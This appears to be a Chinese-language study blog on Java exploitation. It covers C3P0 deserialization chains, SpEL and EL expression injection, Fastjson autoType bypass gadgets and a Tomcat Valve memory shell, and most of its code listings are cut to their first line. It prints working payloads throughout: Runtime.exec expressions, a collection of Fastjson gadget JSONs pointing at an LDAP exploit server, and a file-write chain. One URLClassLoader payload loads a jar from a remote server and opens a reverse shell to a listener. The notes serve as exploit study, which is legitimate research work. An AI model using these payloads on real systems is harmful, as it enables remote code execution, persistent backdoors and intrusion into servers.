这里indirectForm,从传入对象中获取一个Reference对象,封装到一个ReferenceSerialized类中,而我们可以看到,ReferenceSerialized是继承了IndirectlySerialized接口的,就能成功走到if (o instanceof IndirectlySerialized)之中了
看一下IndirectlySerialized,是一个内部类,发现他是继承了serialize接口的
1 | public IndirectlySerialized indirectForm( Object orig ) throws Exception |
在我们拿到的 “ConnectionPoolDataSource” 外表上还是 “ConnectionPoolDataSource”,但是实际上已经变成了 “ReferenceSerialized” 这个类
在PoolBackedDataSourceBase中被封装的connectionPoolDataSource是一个ConnectionPoolDataSource类
且在indirectForm封装过程中,调用orig的getReference方法,要继承Referenceable接口
1 | public IndirectlySerialized indirectForm( Object orig ) throws Exception |
因此我们要构造一个类,继承getReference和ConnectionPoolDataSource接口,并在重写的getReference方法中构造恶意Reference
构造好后,需要重写接口类内的方法
1 | public static class EXP_Loader implements ConnectionPoolDataSource, Referenceable { |
new一个PoolBackedDataSourceBase,通过反射将connectionPoolDataSource修改为我们的EXP_Loader,然后在序列化的过程中对connectionPoolDataSource进行封装,最后可以走到if (o instanceof IndirectlySerialized)中,触发恶意代码
1 | public class C3P0 { |
C3P0的JNDI攻击链,是基于Fastjson依赖的,因此我们需要导入相关依赖
我们需要导入1.2.24版本的,因为在1.2.25中将com.mchange包加入了黑名单
1 | <dependency> |
在JndiRefForwardingDataSource的dereference方法中,存在lookup方法
ctx.lookup( (String) jndiName )
这里的jndiName是通过getJndiName方法获取的
1 | private DataSource dereference() throws SQLException |
进入getJndiName方法,我们可以看到一些判断,如果jndiName是Name类型,则返回(Name) jndiName).clone(),反之则返回String类型的jndiName
1 | public Object getJndiName() |
查找该方法的调用处,只有JndiRefForwardingDataSource中的inner方法内调用了
1 | private synchronized DataSource inner() throws SQLException |
看到这里就可以想到fastjson的调用链,满足了fastjson链的调用,我们这里选择setLoginTimeout方法,它只需要我们传入一个整数即可
1 | package C3P0; |
这里反连地址我没有自己开,可以直接使用yakit工具生成jndi反连地址,最后成功执行
hexBase攻击链能成立的原因是,存在一个WrapperConnectionPoolDataSource类,能它反序列化一串十六进制字符串,首部位于WrapperConnectionPoolDataSource类的构造函数中
这里使用C3P0ImplUtils.parseUserOverridesAsString方法,对userOverridesAsString进行了操作
1 | public WrapperConnectionPoolDataSource(boolean autoregister) |
进入到parseUserOverridesAsString方法中,首先对该字符串进行了截取,然后将截取出来的部分转码后存入了serBytes字节数组中
执行fromByteArray方法时,会调用deserializeFromByteArray方法
1 | private final static String HASM_HEADER = "HexAsciiSerializedMap"; |
进入SerializableUtils.fromByteArray方法看,里面有一个derserializeFromByteArray方法,继续看它干了什么
1 | public static Object fromByteArray(byte[] bytes) throws IOException, ClassNotFoundException |
这里我们可以看出来,他将我们的字节组,都写入了一个输入流,然后对其调用了readObject方法,执行了反序列化的操作
1 | public static Object deserializeFromByteArray(byte[] bytes) throws IOException, ClassNotFoundException |
1 | package hexBase; |
在低版本 FastJson 下, 也可以使用以下的的payload
1 | String payload = "{" + |
加载HexBase字符串,可以作为一种攻击方式,但是缺又需要Fastjson等相关依赖,当目标机器不能出网,而且也没有Fastjson依赖时,C3P0该如何利用
在高版本JDNI利用中,我们可以通过加载本地Factory类进行攻击,利用的条件之一为该工厂类至少存在一个getObjectInstance方法,例如通过Tomcat8中的org.apache.naming.factory.BeanFactory进行EL表达式注入
1 | <dependency> |
我们这里使用URLClass的链子,EXP如下
1 | package NoNetUsing; |
这样就成功弹出了计算器
在 Spring 系列产品中,SpEL 是表达式计算的基础,实现了与 Spring 生态系统所有产品无缝对接。Spring 框架的核心功能之一就是通过依赖注入的方式来管理 Bean 之间的依赖关系,而 SpEL 可以方便快捷的对 ApplicationContext 中的 Bean 进行属性的装配和提取。由于它能够在运行时动态分配值,因此可以为我们节省大量 Java 代码。
SPEL其他简单的用法我们在这里不进行讨论,只研究一下存在攻击面的地方
在SpEL表达式中,使用T(Type)运算符会调用类的作用域和方法,即可以通过类类型表达式来操作类
使用T(Type)来表示java.lang.Class实例,Type必须是类全限定名,java.lang包下的类除外,因为SpEL已经内置了该包,因此该包下的类可以不指定包名。类类型表达式还可以访问类的静态方法与类静态字段
这里就已经存在潜在攻击面
Rumtime类也是包含在
java.lang包中的,因此如果我们能调用Runtime.getRuntime.exec(payload),即可进行命令执行
光说很难理解,我们来写点代码来实操一下
1 | public class Spel { |
用我的话来说就是,T(Type)中的东西,会被解析成一个完完整整的类,因此我们就可以通过Runtime类来执行命令
SpEL的用法有三种形式,一种是在注解当中@Value;一种是XML配置中;最后一种是在代码块中使用Expression
**demo.xml **文件
1 |
|
MainTestDemo.java 文件
1 | package com.spel.xml; |
HelloWorld 文件
1 | package com.pojo; |
运行MainTestDemo.java文件后,首先会去demo.xml文件中加载xml中的配置。实际上,经过调试发现,在加载配置时,就会进行SpEL表达式的解析,从而触发我们的payload
1 | public class EmailSender { |
在一般情况下,这些值都写在properties的配置文件中,很少或几乎没有我们可以控制的地方
后续分析的SpringCVE漏洞都是基于Expression形式的SpEL表达式注入,因此这里单独说明一下该种形式的用法
1 | ExpressionParser parser = new SpelExpressionParser(); |
具体步骤如下:
ExpressionParser 接口表示解析器,提供 SpelExpressionParser 默认实现;ExpressionParser 的 parseExpression 来解析相应的表达式为 Expression 对象;Expression 接口的 getValue 方法根据上下文获得表达式值;应用的示例如下,和xml配置的用法区别为:xml配置解析时,需要界定符#{}来注明SpEL表达式,而Expression用法,会将传入parseExpression方法的字符串直接当成SpEL表达式来解析,无需注明
1 | public class ExpressionCalc {// 字符串字面量 |
SimpleEvaluationContext和StandardEvaluationContext是 SpEL 提供的两个EvaluationContext:
- SimpleEvaluationContext : 针对不需要 SpEL 语言语法的全部范围并且应该受到有意限制的表达式类别,公开 SpEL 语言特性和配置选项的子集。
- StandardEvaluationContext : 公开全套 SpEL 语言功能和配置选项。您可以使用它来指定默认的根对象并配置每个可用的评估相关策略。
SimpleEvaluationContext旨在仅支持 SpEL 语言语法的一个子集,不包括 Java 类型引用、构造函数和 bean 引用;而StandardEvaluationContext是支持全部 SpEL 语法的。
SpEL表达式可以操作类及其方法,可以通过类类型表达式T(Type)来调用任意方法。因为在不指定EvaluationContext的情况下,默认采用的是<font style="color:rgb(80, 80, 92);">StandardEvaluationContext</font>,它包含了SpEL的所有功能,在允许用户输入情况下,可以造成任意命令执行
如下:
1 | public class BasicCalc { |
1 | public class ReflectBypass { |
基础Poc如下(去除界定符):
除了常见的Runtime的命令执行方法还有<font style="color:rgb(80, 80, 92);">ProcessBuilder</font>进行命令执行,后者是前者的基础调用
1 | // PoC原型 |
1 | // 反射调用 |
我们来获取一下所有js引擎信息
1 | public static void main(String[] args) { |
我们比较关注的是下面的js引擎名称
故 getEngineByName 的参数可以填 [nashorn, Nashorn, js, JS, JavaScript, javascript, ECMAScript, ecmascript]
我们来举个例子看一下,其中eval方法就已经很明显可以执行代码
1 | ScriptEngineManager sem = new ScriptEngineManager(); |
那么payload也就很简单就可以构造出来了
1 | // JavaScript引擎通用PoC |
最后也是成功执行
首先构造一个恶意类(这里为反弹shell),并打包为.jar包或者编译为.class
1 | import java.io.IOException; |
在将编译好的文件放在vps上,并起一个http服务
1 | python3 -m http.server 8990 |
payload如下,然后监听2333端口
1 | new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL("http://101.36.122.13:8990/Exp.jar")}).loadClass("Exp").getConstructors()[0].newInstance("101.36.122.13:2333") |
1 | public static void main(String[] args) throws MalformedURLException, ClassNotFoundException, InvocationTargetException, InstantiationException, IllegalAccessException { |
1 | <dependencies> |
漏洞存在在org.apache.xbean.propertyeditor.JndiConverter中的toObjectImpl方法中
但是他不是一个setter或者getter方法
1 | protected Object toObjectImpl(String text) { |
向上找,在AbstractConverter#toObject中调用了该方法
1 | public final Object toObject(String text) { |
继续找的话,我们找到了一个getter方法和一个setter方法,但似乎这个getter方法并不是一个满足条件的getter方法(无参数),因此我们可以看AbstractConverter中的setAsTest方法
其中setAsTest方法源码如下
1 | public final void setAsText(String text) { |
当我们调用JndiConverter的setAsText方法时,它本身没有该方法,就会调用父类的setAsText
方法,他的父类正好是AbstractConverter
1 | public class JndiConverter extends AbstractConverter |
这里会调用toObject方法,该方法调用toObject方法,最后toObject调用toObjectImpl方法
1 | public final void setAsText(String text) { |
在AbstractConverter中没有toObjectImpl,所以这里调用到JndiConverter的toObjectImpl方法,就触发了JNDI注入
1 | protected Object toObjectImpl(String text) { |
1 | public static void main(String[] args) { |
运行后
我们进入CheckAutoType中,对里面的一些过滤进行以下分析,有以下几个新的限制
@type类名长度[检测L检测LL检测1 | if (typeName == null) { |
继续向下,internalWhite为false , 当我们开启autoTypeSupport时,就会走入下面的逻辑
首先通过hash进行白名单匹配,后续进行黑名单过滤
1 | if (!internalWhite && (this.autoTypeSupport || expectClassFlag)) { |
因为并没有被黑名单过滤,所以我们走到了这里
autoTypeSupport为true,因此我们不会走到if代码中并抛出异常,而是会走出if判断
1 | if (!this.autoTypeSupport) { |
我们在后面的代码中就会执行loadClass方法,最后遍历调用setter与getter方法,最终执行恶意代码
1 | if (clazz == null && (autoTypeSupport || jsonType || expectClassFlag)) { |
新版本运行后会抛出以下异常
1 | Exception in thread "main" com.alibaba.fastjson.JSONException: autoType is not support. org.apache.xbe |
1 | {"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory", "jndiNames":["ldap://localhost:1389/Exploit"], "Realms":[""]} |
1 | {"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://localhost:1389/Exploit"} |
1 | {"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://localhost:1389/Exploit"}} |
这几个Gadget都十分简单,不在过多分析
1 | import com.alibaba.fastjson.JSON; |
参考如下
https://github.com/alibaba/fastjson/wiki/%E5%BE%AA%E7%8E%AF%E5%BC%95%E7%94%A8
在Fastjson中,向JsonArray类型的对象里面add数据时,如果数据相同,那么就会被替换成$ref,相当于定义了一下以便简化,因为数据也是一样的
$ref即循环引用:当一个对象包含另一个对象时,Fastjson会将$ref解析成引用
| 语法 | 描述 |
|---|---|
| {“$ref”:”$”} | 引用根对象 |
| {“$ref”:”@”} | 引用自己 |
| {“$ref”:”..”} | 引用父对象 |
| {“$ref”:”../..”} | 引用父对象的父对象 |
| {“$ref”:”$.members[0].reportTo”} | 基于路径的引用 |
那这样就清楚了,org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup类PoC中后面那段的{“$ref”:”$.tm”},实际上就是基于路径的引用,相当于是调用root.getTm()函数,进而直接调用了tm字段的getter方法了
1 | {"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup", "jndiNames":["ldap://localhost:1389/Exploit"], "tm": {"$ref":"$.tm"}} |
1 | {"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://localhost:1389/Exploit","instance":{"$ref":"$.instance"}} |
这几个Gadget也都十分简单,不在过多分析
1 | import com.alibaba.fastjson.JSON; |
本次绕过的关键处在于checkAutoType()的第二个参数expectClass,我们可以通过构造恶意JSON数据、传入某个类作为exceptClass参数在传入另一个exceptClass的子类或者实现类来实现绕过checkAutoType()函数执行恶意操作
步骤如下:
checkAutoType函数1 | public class FastjsonExcept implements AutoCloseable { |
POC如下
1 | {"@type":"java.lang.AutoCloseable","@type":"com.FastjsonExcept","cmd":"calc"} |
可以看到,在无需AutoType的情况下,即可执行
我们直接在checkAutoType下断点调试
第一次转入的类是AutoCloseable进行校验,这里我们可以看到expectClass为null
然后从缓存Mapping中直接获取到AutoCloseable,然后对获取的clazz进行了一系列的判断,判断clazz是不是null,以及internalWhite的判断,internalWhite里面的白名单一定是很安全的
后续会出现对expectClass的判断,判断expectClass是否为空,且判断它是否继承HashMap类,若满足情况,则抛出异常,反之则会返回类
1 | if (clazz != null) { |
回到DefaultJSONParser后,获取到clazz后再继续执行,根据AutoCloseable类获取到反序列化器为JavaBeanDeserializer使用该反序列化器进行反序列化操作
继续往里面走,调用JavaBeanDeserializer的deserialze方法,传入的第二个参数type即为AutoCloseable类
往下面的逻辑,就是解析后面类的过程。这里看到获取不到对象反序列化器后,就会进入到if的判断中,设置 type 参数即 java.lang.AutoCloseable 类为 checkAutoType() 方法的 expectClass 参数来调用 checkAutoType() 函数来获取指定类型,然后在获取指定的反序列化器
这次我们第二次进入checkAutoType方法,typeName是我们POC中的第二个类,exceptClass参数是POC中指定的第一个类
因为AutoCloseable并不是黑名单中的类,所以expectClassFlag被设置为true
最后走到我们刚刚说的地方,当这个类不在白名单,且autoType开启或者expectClassFlag为true时,即可进入Auto开启时的检测逻辑
往下,由于expectClassFlag为true,进入如下的loadClass()逻辑来加载目标类,但是由于AutoType关闭且jsonType为false,因此调用loadClass()函数的时候是不开启cache即缓存的
跟进该函数中,这里使用AppClassLoader加载 VulAutoCloseable 类并直接返回
往下,判断其是否为jsonType,若true的话直接添加Mapping缓存并返回类,否则接着判断返回的类是否是ClassLoader、DataSource、RowSet等类的子类,是的话直接抛出异常
这也是过滤大多数JNDI注入Gadget的机制
最重点的是以下部分,这里当expectClass不为null时,就会判断我们的clazz是否为expectClass的子类,若它继承与expectClass的话,就会被添加到Mapping缓存中并返回该目标类,反之则抛出异常
这里解释的我们的恶意类必须要继承自expectClass类,只有目标类是expectClass类的子类时,才能通过这里的判断,后续反序列化即可造成恶意代码的执行
在我们的POC中定义了两个
@type
第一个type进去什么事情都没有发生,它是作为第二个type类的expectClass传入的,而当第二个type类为第一个type的继承类,且他的setter/getter或构造方法中存在危险方法时,即可被我们利用
找到的是IntputStream和OutputStream,他们都是实现自AutoCloseable接口的
依赖:
1 | <dependency> |
我们来看一下SafeFileOutputStream的源代码,在他的构造函数public SafeFileOutputStream(String targetPath, String tempPath)中,若targetPath文件不存在,且tempPath文件存在,就会把tempPath复制到targetPath中
利用其构造函数,我们可以实现特定web场景下的任意文件读取
1 | package org.eclipse.core.internal.localstore; |
根据原理来写一个POC
1 | public class Fastjson { |
可以看到成功读取文件内容并写入flag.txt
依赖:
1 | <dependency> |
该类写入了提供了setOutputStream和setBuffer两个setter方法用来写入输入流,其中的buffer参数值是文件内容,outputStream参数值就是前面的SafeFileOutputStream类对象,而要触发写文件操作则需要调用其flush()方法,该方法将流写入一个文件内
1 | /** Sets a new OutputStream. The position and total are reset, discarding any buffered bytes. |
写入文件时,我们就可以考虑写入恶意文件
接下来我们就看,怎么样去触发这个flush函数了,通过查找用法查看,只有在close()和require()函数被调用时才会触发,其中require只有在调用write相关函数时才会被触发,存在着链子的思维
我们找到ObjectOutputStream类,其中它的内部类BlockDataOutputStream的构造函数,将OutputStream类型参数赋值给了out成员变量,而其中的setBolockDataMode函数调用了drain方法,drain中又调用了out.write方法,从而调用了flush方法
1 | /** |
对于setBlockDataMode函数的调用,在ObjectOutputStream类的有参构造函数中就存在:
1 | public ObjectOutputStream(OutputStream out) throws IOException { |
但是Fastjson优先获取ObjectOutputStream类的无参构造方法,只能找它的继承类来触发了
我们找到一个只有有参构造方法的类:com.sleepycat.bind.serial.SerialOutput
依赖:
1 | <dependency> |
我们可以看到,它的有参构造方法,是使用了他父类ObjectOutputStream的有参构造方法,这就满足我们之前的要求了
1 | public SerialOutput(OutputStream out, ClassCatalog classCatalog) |
POC如下,用到了Fastjson循环引用的技巧来调用
1 | { |
在expectClass的对比逻辑中,对类名进行了hash处理在比较hash黑名单,并添加了几个类
有人通过彩虹表碰撞,知道了其中新添加的三个类为如下
| 版本 | 十进制Hash值 | 十六进制Hash值 | 类名 |
|---|---|---|---|
| 1.2.69 | 5183404141909004468L | 0x47ef269aadc650b4L | java.lang.Runnable |
| 1.2.69 | 2980334044947851925L | 0x295c4605fd1eaa95L | java.lang.Readable |
| 1.2.69 | -1368967840069965882L | 0xed007300a7b227c6L | java.lang.AutoCloseable |
在1.2.68之后的版本中,fastjson添加了safeMode的支持
该参数开启后,完全禁用autoType。所有安全修复版本sec10也支持safeMode配置
代码中开启SafeMode代码如下
1 | ParserConfig.getGlobalInstance().setSafeMode(true); |
开启之后,就完全禁用AutoType即@type了,这样就能防御住Fastjson反序列化漏洞了。具体的处理逻辑,是放在checkAutoType()函数中的前面,获取是否设置了SafeMode,如果是则直接抛出异常终止运行
1 | {"@type":"com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://localhost:1389/Exploit"}或{"@type":"com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://localhost:1389/Exploit"} |
1 | {"@type":"org.apache.commons.proxy.provider.remoting.SessionBeanProvider","jndiName":"ldap://localhost:1389/Exploit","Object":"a"} |
1 | {"@type":"org.apache.cocoon.components.slide.impl.JMSContentInterceptor", "parameters": {"@type":"java.util.Hashtable","java.naming.factory.initial":"com.sun.jndi.rmi.registry.RegistryContextFactory","topic-factory":"ldap://localhost:1389/Exploit"}, "namespace":""} |
1 | {"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://localhost:1389/Exploit"}或{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://localhost:1389/Exploit"} |
com.caucho.config.types.ResourceRef类PoC:
1 | {"@type":"com.caucho.config.types.ResourceRef","lookupName": "ldap://localhost:1389/Exploit", "value": {"$ref":"$.value"}} |
1 | {"@type":"org.apache.aries.transaction.jms.RecoverablePooledConnectionFactory", "tmJndiName": "ldap://localhost:1389/Exploit", "tmFromJndi": true, "transactionManager": {"$ref":"$.transactionManager"}} |
org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory类PoC:
1 | {"@type":"org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory", "tmJndiName": "ldap://localhost:1389/Exploit", "tmFromJndi": true, "transactionManager": {"$ref":"$.transactionManager"}} |
今天来学习EL表达式注入
作用:
用法:
使用的前提是通过page标签设置不忽略EL表达式
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" isELIgnored="false" %> |
基础操作符:
这里我们列出来几个较为重要的算术和逻辑操作符
| 操作符 | 描述 |
|---|---|
| . | 访问一个Bean属性或者一个映射条目 ${param.order} |
| [] | 访问一个数组或者链表的元素 ${param[“order”]} |
| () | 组织一个子表达式以改变优先级 |
语法:
EL表达式的用法为${expression}
例如${<font style="color:rgb(102, 102, 102);">userinfo</font>}代表从域中获取变量userinfo的值
而JSP中存在四大域,分别为
EL表达式获取数据时,依次从以上四个域中获取,直到寻找到该变量(若没有找到则返回"")
有些双亲委派的味道
EL表达式注入漏洞的漏洞原理是:表达式外部可控导致攻击者注入恶意表达式从而实现任意代码执行,SpEL、OGNL等表达式注入也是一样的漏洞原理
一般来说,EL表达式注入漏洞的外部可控点入口都是在Java程序代码中,即Java程序中的EL表达式内容全部或部分是外部获取的
1 | //对应于JSP页面中的pageContext对象(注意:取的是pageContext对象) |
我们将参数X设为以下payload
1 | ${pageContext.setAttribute("a","".getClass().forName("java.lang.Runtime").getMethod("exec","".getClass()).invoke("".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null),"calc.exe"))} |
当我们访问JSP页面时,服务端就会解析构造的恶意EL表达式,从而造成EL表达式注入
在实际的应用场景中,几乎没有也无法直接从外部控制JSP页面中的EL表达式的。而且目前已知的EL表达式注入漏洞都是框架层面服务端执行的EL表达式外部可控导致的
正常情况下使用message标签,text属性使用EL表达式从请求中取值
1 | <%@ taglib uri="http://www.springframework.org/tags" prefix="spring"%> |
当我们访问以下url时候,${applicationScope}就会被当作EL表达式执行
我们改变EL表达式的内容,就可以达到其他目的
1 | http://localhost/tag.jsp?a=${applicationScope} |
1 | ${''.getClass().forName('java.lang.Runtime').getMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null),'calc.exe')} |
EL 曾经是
JSTL的一部分。然后,EL 进入了 JSP 2.0 标准。现在,尽管是 JSP 2.1 的一部分,但 EL API 已被分离到包javax.el中, 并且已删除了对核心 JSP 类的所有依赖关系。换句话说:EL 已准备好在非 JSP 应用程序中使用!也就是说,现在 EL 表达式所依赖的包
javax.el等都在JUEL相关的 jar 包中。JUEL(Java Unified Expression Language)是统一表达语言轻量而高效级的实现,具有高性能,插件式缓存,小体积,支持方法调用和多参数调用,可插拔多种特性。
需要的 jar 包:juel-api-2.2.7、juel-spi-2.2.7、juel-impl-2.2.7
在pom.xml中导入依赖
1 | <dependency> |
运行后,通过反射调用Runtime类,成功执行恶意代码
1 | package drunkbaby.basicelvul; |
1 | // Unicode编码内容为前面反射调用的PoC |
1 | // 八进制编码内容为前面反射调用的PoC |
JohnFord 编码脚本如下
1 | str = "${''.getClass().forName('java.lang.Runtime').getMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null),'calc.exe')}" |
1 | javax.el.ExpressionFactory.createValueExpression() |
tomcat的内部结构
tomcat由Connector和Container两部分组成
我觉得下面这幅图很好的展示了tomcat的结构
我们要学习 Valve 型内存马,就必须要先了解一下 Valve 是什么
在了解 Valve 之前,我们先来简单了解一下 Tomcat 中的管道机制。
我们知道,当 Tomcat 接收到客户端请求时,首先会使用
Connector进行解析,然后发送到Container进行处理。那么我们的消息又是怎么在四类子容器中层层传递,最终送到 Servlet 进行处理的呢?这里涉及到的机制就是 Tomcat 管道机制。管道机制主要涉及到两个名词,Pipeline(管道)和 Valve(阀门)。如果我们把请求比作管道(Pipeline)中流动的水,那么阀门(Valve)就可以用来在管道中实现各种功能,如控制流速等。
因此通过管道机制,我们能按照需求,给在不同子容器中流通的请求添加各种不同的业务逻辑,并提前在不同子容器中完成相应的逻辑操作。个人理解就是管道与阀门的这种模式,我们可以通过调整阀门,来实现不同的业务。
在Catalina中,有着四种Container,每个容器都有自己的Pipeline(管道)组件,每个Pipeline组件至少会存在一个Valve(阀门),这个Valve我们称之为BaseValve(基础阀)
Pipeline 提供了 **addValve** 方法,可以添加新 Valve 在 basic 之前,并按照添加顺序执行
当Connector将Request交给Container处理后,Container第一层就是Engine容器,但在tomcat中Engine容器不会直接调用它下一层Host容器去处理相关请求,而是通过Pipeline组件去处理,跟pipeline相关的还有个也是容器内部的组件,叫做valve组件
下面是 Pipeline 发挥功能的原理图
1 | import org.apache.catalina.connector.Request; |
实现好Valve后,我们需要通过addValve方法,将Valve添加进Pipeline中,我们只要将Valve添加进去,就能实现内存马的注入
看一眼Pipeline的接口,存在addValve方法,我们可以通过这个方法把Valve添加进去
1 | package org.apache.catalina; |
找到Pipeline接口的实现类StandardPipeline,,但是我们是无法直接获取到 StandardPipeline 的,所以这里去找一找 StandardContext 有没有获取到 StandardPipeline 的手段
在StandardContext中,找到了一个getPipeline方法,跟进查看,会返回当前的Pipeline
可以看一下注解,这里写着 return 一个 Pipeline 类型的类,它是用来管理 Valves 的
1 | protected final Pipeline pipeline = new StandardPipeline(this); |
所以可以证明这一点
1 | StandardContext.getPipeline() = StandardPipeline; // 二者等价 |
有个问题:我们的 Valve 是应该放到 Filter,Listener,还是 Servlet 里面?
应该是在Servlet中被加载的,因为在Servlet内存马的HTTP11Processor 的加载 HTTP 请求当中,是出现了 Pipeline 的 basic 的
所以我们通过 Servlet 来加载。
StandardContextgetPieline()方法获取StandardPipelineaddValve方法将恶意Valve添加入StandardPipeline1 | <%! |
后续和前几个内存马一样,通过反射来获取StandardContext
1 | ServletContext servletContext = request.getSession().getServletContext(); |
这里从别的师傅那里看到的,更简单方法的获取StandardContext,两个都是可以的
1 | // 更简单的方法 获取StandardContext |
最后实现内存马的注入
1 | <% |
最终poc如下
1 | <%@ page import="java.lang.reflect.Field" %> |
启动tomcat服务后,访问我们上传的addValve.jsp后,Vlave内存马就被成功注入,后续访问任意路径,都会触发我们的Valve内存马
